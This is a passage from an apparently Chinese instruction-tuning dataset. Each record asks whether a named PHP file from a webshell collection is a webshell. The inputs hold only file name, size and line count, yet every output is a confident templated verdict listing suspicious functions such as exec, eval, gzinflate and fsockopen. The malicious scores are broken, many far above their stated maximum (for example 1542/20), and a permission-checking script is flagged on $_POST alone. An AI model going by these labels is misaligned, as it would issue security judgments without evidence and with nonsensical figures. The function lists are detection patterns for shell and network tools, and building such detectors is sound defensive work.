"104c85f2e4ca44b0e8f794c5b0d191c0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"C99madShell v. 2.0 madnet edition.php\", \"文件类型\": \"php\", \"文件大小\": \"44348 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/C99madShell v. 2.0 madnet edition.php", "malicious_score": 13, "md5_hash": "9e4b767e9c70b275f7e57e4314862883"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-mini-shell-php.php.php\", \"文件类型\": \"php\", \"文件大小\": \"14427 bytes\", \"行数\": 195}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/b374k-mini-shell-php.php.php", "malicious_score": 13, "md5_hash": "89b44581dd1760b0d7181692b28c2997"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PH_Vayv.php\", \"文件类型\": \"php\", \"文件大小\": \"25276 bytes\", \"行数\": 597}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, mkdir\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PH_Vayv.php", "malicious_score": 10, "md5_hash": "33f347021898752dc7ed31b9f457cc98"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"STNC WebShell v0.8.php\", \"文件类型\": \"php\", \"文件大小\": \"6896 bytes\", \"行数\": 168}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fputs(, exec(, $_POST[, system(, eval( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\( 恶意度评分: 80/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/STNC WebShell v0.8.php", "malicious_score": 80, "md5_hash": "2e56cfd5b5014cbbf1c1e3f082531815"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mof提权带回显带清楚命令版本.php\", \"文件类型\": \"php\", \"文件大小\": \"2963 bytes\", \"行数\": 98}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_COOKIE[, $_GET[ 恶意度评分: 51/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/mof提权带回显带清楚命令版本.php", "malicious_score": 51, "md5_hash": "6e56cd837863b2bde08650908cedf4bc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"matamu.php\", \"文件类型\": \"php\", \"文件大小\": \"3947 bytes\", \"行数\": 146}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, exec( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/matamu.php", "malicious_score": 6, "md5_hash": "1a95f0163b6dea771da1694de13a3d8d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHANTASMA.php\", \"文件类型\": \"php\", \"文件大小\": \"26577 bytes\", \"行数\": 634}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHANTASMA.php", "malicious_score": 15, "md5_hash": "bde97ee8db425dec23448e6f8332a346"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"404webshell.php\", \"文件类型\": \"php\", \"文件大小\": \"71772 bytes\", \"行数\": 3228}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 61/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/404webshell.php", "malicious_score": 61, "md5_hash": "28a187c8eb444b5abd17622140967926"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Ayyildiz Tim -AYT- Shell v 2.1 Biz.php\", \"文件类型\": \"php\", \"文件大小\": \"10144 bytes\", \"行数\": 317}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, exec( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.php", "malicious_score": 6, "md5_hash": "3e47ebec65d4cb96fe00dd22f17beca9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Dx.php\", \"文件类型\": \"php\", \"文件大小\": \"111606 bytes\", \"行数\": 2026}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 1542/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Dx.php", "malicious_score": 1542, "md5_hash": "d38dba513196df2d2d5a57a0b27cfd10"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"CasuS 1.5.php\", \"文件类型\": \"php\", \"文件大小\": \"14037 bytes\", \"行数\": 368}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, system(, $_POST[, fwrite( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 20/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/CasuS 1.5.php", "malicious_score": 20, "md5_hash": "a3b46cf42a4601894e098b743023dc6c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"12309.php\", \"文件类型\": \"php\", \"文件大小\": \"102640 bytes\", \"行数\": 2066}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, gzinflate(, file_get_contents(, $_GET[, fwrite( 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1026/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/12309.php", "malicious_score": 1026, "md5_hash": "967dc4a0d0f104b52cd5fcd9581c9e06"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"中国木马资源网- WwW.7jyewu.Cn.php\", \"文件类型\": \"php\", \"文件大小\": \"140454 bytes\", \"行数\": 2488}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1035/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/中国木马资源网- WwW.7jyewu.Cn.php", "malicious_score": 1035, "md5_hash": "3a585fd5496913557b63de1589371888"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"DAws.php\", \"文件类型\": \"php\", \"文件大小\": \"69894 bytes\", \"行数\": 2701}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_POST[, exec( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 253/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/DAws.php", "malicious_score": 253, "md5_hash": "0c73062cff513f5300d15ea39e421d28"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NetworkFileManagerPHP.php\", \"文件类型\": \"php\", \"文件大小\": \"122250 bytes\", \"行数\": 5603}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, system(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 230/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/NetworkFileManagerPHP.php", "malicious_score": 230, "md5_hash": "c7efba07b27e9b9038c292fcc9a4bf90"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"simple-backdoor.php\", \"文件类型\": \"php\", \"文件大小\": \"328 bytes\", \"行数\": 17}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, system( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/simple-backdoor.php", "malicious_score": 9, "md5_hash": "f091d1b9274c881f8e41b2f96e6b9936"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Antichat Shell. Modified by Go0o$E.php\", \"文件类型\": \"php\", \"文件大小\": \"31546 bytes\", \"行数\": 693}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 307/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Antichat Shell. Modified by Go0o$E.php", "malicious_score": 307, "md5_hash": "49aacf279c6c4d2156e752121efa7a02"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"404 Not Found.php\", \"文件类型\": \"php\", \"文件大小\": \"15005 bytes\", \"行数\": 38}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/404 Not Found.php", "malicious_score": 16, "md5_hash": "ced050df5ca42064056a7ad610a191b3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"GFS_web-shell_ver_3.1.7_-_PRiV8.php\", \"文件类型\": \"php\", \"文件大小\": \"22302 bytes\", \"行数\": 520}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec(, system(, passthru(, shell_exec( 具备文件操作能力: fopen\\s*\\( 恶意度评分: 91/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/GFS_web-shell_ver_3.1.7_-_PRiV8.php", "malicious_score": 91, "md5_hash": "a7e3ff593ce2d928cc0b236422e78b40"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php-include-w-shell.php\", \"文件类型\": \"php\", \"文件大小\": \"48246 bytes\", \"行数\": 1312}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fwrite(, exec(, system(, eval( 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 113/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/php-include-w-shell.php", "malicious_score": 113, "md5_hash": "4e913f159e33867be729631a7ca46850"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"中国木马资源网-WwW.MumaSec.TK.php\", \"文件类型\": \"php\", \"文件大小\": \"138635 bytes\", \"行数\": 2488}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1035/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/中国木马资源网-WwW.MumaSec.TK.php", "malicious_score": 1035, "md5_hash": "b736dab1f9fb39ed1ac70d5830306862"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Simple_PHP_backdoor_by_DK.php\", \"文件类型\": \"php\", \"文件大小\": \"349 bytes\", \"行数\": 19}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, system( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Simple_PHP_backdoor_by_DK.php", "malicious_score": 9, "md5_hash": "43eb84d5e3ddfc935701cde1740a0908"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PhpShell 2.0.php\", \"文件类型\": \"php\", \"文件大小\": \"8686 bytes\", \"行数\": 259}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 57/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PhpShell 2.0.php", "malicious_score": 57, "md5_hash": "f8a6d5306fb37414c5c772315a27832f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"tryag.php\", \"文件类型\": \"php\", \"文件大小\": \"51687 bytes\", \"行数\": 1521}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_POST[, exec( 发现混淆技术: pack\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 215/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/tryag.php", "malicious_score": 215, "md5_hash": "d3206e649aa75e49b6337494ba8df392"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"kral.php\", \"文件类型\": \"php\", \"文件大小\": \"10380 bytes\", \"行数\": 371}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec( 包含网络功能: curl_exec 恶意度评分: 55/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/kral.php", "malicious_score": 55, "md5_hash": "7a05cdee767f824205d881180c54395e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Micro_Webshell.php\", \"文件类型\": \"php\", \"文件大小\": \"54 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Micro_Webshell.php", "malicious_score": 6, "md5_hash": "2f96f1d286f9565f01be0ad83b23de01"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP检测文件夹权限.php\", \"文件类型\": \"php\", \"文件大小\": \"2088 bytes\", \"行数\": 77}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHP检测文件夹权限.php", "malicious_score": 6, "md5_hash": "2768c724627d7f60c9da793cd3c8294f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"qsd-php-backdoor.php\", \"文件类型\": \"php\", \"文件大小\": \"13914 bytes\", \"行数\": 429}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 171/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/qsd-php-backdoor.php", "malicious_score": 171, "md5_hash": "e57cd978725a081e84931961969ed528"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NCC Shell v1.0.0.php\", \"文件类型\": \"php\", \"文件大小\": \"2592 bytes\", \"行数\": 60}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: Shell_Exec(, $_REQUEST[, $_GET[, Exec( 具备文件操作能力: move_uploaded_file 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/NCC Shell v1.0.0.php", "malicious_score": 13, "md5_hash": "77970bda2a9061e9f48385ea6cca0699"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"azrail 1.0 by C-W-M.php\", \"文件类型\": \"php\", \"文件大小\": \"10421 bytes\", \"行数\": 284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[, fwrite( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/azrail 1.0 by C-W-M.php", "malicious_score": 17, "md5_hash": "209eabe5bace5398ae84d86e31e1a94b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NGH.php\", \"文件类型\": \"php\", \"文件大小\": \"18349 bytes\", \"行数\": 462}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 124/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/NGH.php", "malicious_score": 124, "md5_hash": "ddc515f35d9c8cbfdbed0d80346ef837"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"KAdot_Universal_Shell_v0.1.6.php\", \"文件类型\": \"php\", \"文件大小\": \"4888 bytes\", \"行数\": 230}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, fputs(, eval(, passthru( 发现混淆技术: base64_decode 包含网络功能: fsockopen 具备文件操作能力: copy\\s*\\( 恶意度评分: 82/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/KAdot_Universal_Shell_v0.1.6.php", "malicious_score": 82, "md5_hash": "6c7bf66c87e56dec1052941c6de1c2d5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHPRemoteView.php\", \"文件类型\": \"php\", \"文件大小\": \"35387 bytes\", \"行数\": 1073}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, eval( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHPRemoteView.php", "malicious_score": 10, "md5_hash": "3093bb66d965b30122faf588c9442c4b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pws.php\", \"文件类型\": \"php\", \"文件大小\": \"869 bytes\", \"行数\": 35}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[ 具备文件操作能力: copy\\s*\\( 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/pws.php", "malicious_score": 16, "md5_hash": "ecdc6c20f62f99fa265ec9257b7bf2ce"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"g00nshell-v1.3.php\", \"文件类型\": \"php\", \"文件大小\": \"29760 bytes\", \"行数\": 730}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, exec(, eval(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: wget, urllib 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 278/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/g00nshell-v1.3.php", "malicious_score": 278, "md5_hash": "b2655a9ec99d0c465c3f57c659abb47e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Predator.php\", \"文件类型\": \"php\", \"文件大小\": \"43704 bytes\", \"行数\": 1367}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fputs(, exec(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 258/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Predator.php", "malicious_score": 258, "md5_hash": "7101fe72421402029e2629f3aaed6de7"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"s72_Shell_v1.1_Coding.php\", \"文件类型\": \"php\", \"文件大小\": \"5263 bytes\", \"行数\": 141}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 具备文件操作能力: copy\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/s72_Shell_v1.1_Coding.php", "malicious_score": 7, "md5_hash": "c282757c410cf44354ed586ab0eb124a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Php Backdoor v 1.0 by ^Jerem.php\", \"文件类型\": \"php\", \"文件大小\": \"9042 bytes\", \"行数\": 206}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, system(, eval( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Php Backdoor v 1.0 by ^Jerem.php", "malicious_score": 16, "md5_hash": "d9acefc40748df4a8dc062fd2627bd69"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"change.php\", \"文件类型\": \"php\", \"文件大小\": \"1766 bytes\", \"行数\": 60}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fputs(, exec(, system(, passthru(, shell_exec( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\( 恶意度评分: 24/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/change.php", "malicious_score": 24, "md5_hash": "9aa70a60b95da53059ac83627d808c0e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"nShell v1.0.php\", \"文件类型\": \"php\", \"文件大小\": \"12817 bytes\", \"行数\": 371}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: Eval(, $_REQUEST[, $_GET[, fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 77/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/nShell v1.0.php", "malicious_score": 77, "md5_hash": "47309b6b6045618ccc87b49074594038"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Cyber Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"35734 bytes\", \"行数\": 1033}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, exec(, system( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 145/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Cyber Shell.php", "malicious_score": 145, "md5_hash": "af8996deb5126281244237d17577c687"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Antichat Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"12828 bytes\", \"行数\": 366}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, eval( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 130/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Antichat Shell.php", "malicious_score": 130, "md5_hash": "128e90b5e2df97e21e96d8e268cde7e3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57_iFX.php\", \"文件类型\": \"php\", \"文件大小\": \"87741 bytes\", \"行数\": 1917}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1058/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": 